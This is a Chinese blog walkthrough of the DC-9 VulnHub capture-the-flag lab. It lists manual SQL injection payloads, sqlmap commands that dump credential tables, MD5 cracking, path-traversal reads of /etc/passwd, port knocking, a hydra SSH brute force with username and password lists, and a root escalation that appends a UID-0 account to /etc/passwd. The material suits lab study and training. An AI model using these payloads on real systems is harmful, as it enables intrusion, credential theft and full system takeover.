IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> DC-9靶机渗透测试详细教程 -> 正文阅读

[网络协议]DC-9靶机渗透测试详细教程

DC-9

DC-9下载:https://download.vulnhub.com/dc/DC-9.zip.torrent

攻击者kali:192.168.1.11

受害者DC-9:192.168.1.14

使用arp-scan -l得到DC-9IP地址

用nmap扫描DC-9

nmap -sS -A -p- 192.168.1.14

扫出了22和80端口,但是22端口是filtered

访问一下80

没有从定向,正常访问,提示我们从菜单中选择一个选项,小孩子才做选择,我全都看看有啥。

在Display all Records里有一些用户信息

第三个Search,搜索

提示我们可以使用名字的姓氏进行搜索,前面第二个菜单不是有用户信息嘛,复制第一个用户的性氏搜索一下

得到了用户得信息,尝试一下手工注入看看,确定一下是不是有sql注入漏洞

常用的手工注入命令

1' and 1=1;#? 判断是否可以被注入

1' or 1=1;#?? 尝试获取全部账号信息

1' union all select 1,2;#? 尝试获取参数个数

1' union all select 1,(@@version);#? 获取数据库版本

1' union all select 1,(databases());# ?获取数据库名称

判断一下是否能注入

Mary' and 1=1;#

能注入成功

既然有注入点,直接sqlmap搞起

想直接url注入,没想到失败

换个方式用burp抓包,然后再注入

在kali打开burp

查看burp的代理

浏览器设置好一样的代理

burp开启抓包

浏览器在Search搜索

提交

burp抓到数据包

右键选择copy to file

命名为dc9.txt点击保存

文件里就会有抓包的数据

burp关掉抓包

sqlmap注入 ??-r注入是http头注

sqlmap -r dc9.txt --dbs

得到两个数据库,Staff和users,肯定选users

继续注入

sqlmap -r dc9.txt -D users --tables

sqlmap -r dc9.txt -D users -T UserDetails –dump

得出一些账号密码信息不知道有什么用

我最后真是啪啪打脸,user里面没有管理员得信息

注入另一个表

sqlmap -r dc9.txt -D Staff --tables?

一样注入users

sqlmap -r dc9.txt -D Staff -T Users --dump

获取表里得信息

爆出了管理员和密码

看起来像是md5加密的,拿去md5解密一下

由于网上的MD5解密都是收费的

尝试安装一下啊md5解密工具

在gitee上找到

https://gitee.com/mirrors_s0md3v/Hash-Buster?_from=gitee_search

下载到kali

git clone https://gitee.com/mirrors_s0md3v/Hash-Buster/

进入到Hash-Buster目录,执行脚本

cd Hash-Buster/?

python3 hash.py -s 856f5de590ef37314e7c3bdf6f8a66dc

将md5值放到后面,最后解出密码

密码为 : transorbital1

去尝试登录试试

登录成功,下面这里还提示我们有文件包含漏洞

尝试一下看看有没有

因为使用的是apache服务器,可以判断他的网页路径在/var/www/html

../../../etc/passwd下没有显示,应该是在html下还有一个目录,然后我加了一个../

http://192.168.1.14/welcome.php?file=../../../../etc/passwd

成功显示

看到有几个眼熟的账号

结果对对比一看

这不是之前sql注入users数据库表里的数据嘛UserDetails

之前还不知道干啥用

那么是不是可以尝试一下ssh爆破,毕竟数据表里有账号密码

但是ssh状态为filtered,有可能是被防火墙过滤了

去查看一下配置

http://192.168.1.14/welcome.php?file=../../../../etc/knockd.conf

分别去连续访问这三个端口才行 ?7469 8475? 9842

使用nmap搞一下

再次扫描就发现22端口开了

在桌面创建两个txt文本分别为dc9user.txt和dc9pass.txt

dc9user.txt

marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

dc9pass.txt

3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

将账号密码放入

接下来使用hydra来爆破

hydra -L dc9user.txt -P dc9pass.txt 192.168.1.14 ssh

爆出了三个账号

login: chandlerb?? password: UrAG0D!

login: joeyt?? password: Passw0rd

login: janitor?? password: Ilovepeepee

三个都试试登录ssh

经过一番折腾

在janitor账号下发现一个密码字典

那么在将这几个密码加入dc9pass.txt下再爆破一次看看,是否能在出账号

最后多爆出另一个账号

login: fredf?? password: B4-Tru3-001

进行ssh登录

登录成功

查看一下权限

提示这个文件

进入这个文件的目录看看

cd /opt/devstuff/dist/test/

尝试执行一下test文件

执行不了,需要test.py

返回到devstuff目录下看到有个test.py的脚本

代码的意思是将第一个文件的内容写入第二个文件中

那就创建一个文件写入我们自己登录的账户信息

先使用openssl工具生成一个hash值

意思是demon 的密码为123456

openssl passwd -1 -salt demon 123456

将hash值复制到

echo 'demon:$1$demon$Mspg7FhbFwGLZ4T2s/qI6/:0:0:root:/bin/bash' >> /tmp/demon

将我们的登录信息写入到tmp目录下的demon

再利用test将/tmp/demon的内容写入到/etc/passwd

sudo ./test /tmp/demon /etc/passwd

切换用户到我们创建的demon用户

su demon

输入密码回车,查看当前权限,是root,提权成功

打开交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

在root目录下找到flag

DC-9总结

sql手工注入判断是否有sql注入漏洞

sqlmap的rul注入失败,使用burp抓包,然后http头注

burp熟练度使用

sqlmap的注入获取到用户信息,还有admin管理账号的hash值

因为是md5加密,下载Hash-Buster解密md5,得到管理员密码

登录后提示有文件包含漏洞,通过对apache的熟练判断网页所在位置利用文件包含漏洞查看文件

查看/etc/passwd获取信息,方便进一步ssh账号爆破

ssh状态为filtered,查看/etc/knockd配置文件

nmap访问三个端口7469、8475、9842,ssh端口open

将数据库注入获取到的账号密码存储为txt文本

使用hydra爆破ssh登录的账号密码

在三个账号下找到密码字典,从新尝试爆破,获取新的ssh登录账号

尝试提权

openssl工具的使用

提权成功

打开交互模式python -c 'import pty;pty.spawn("/bin/bash")'

在root目录下拿到flag

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-08 08:27:37  更:2022-05-08 08:30:29 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/19 9:32:49-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码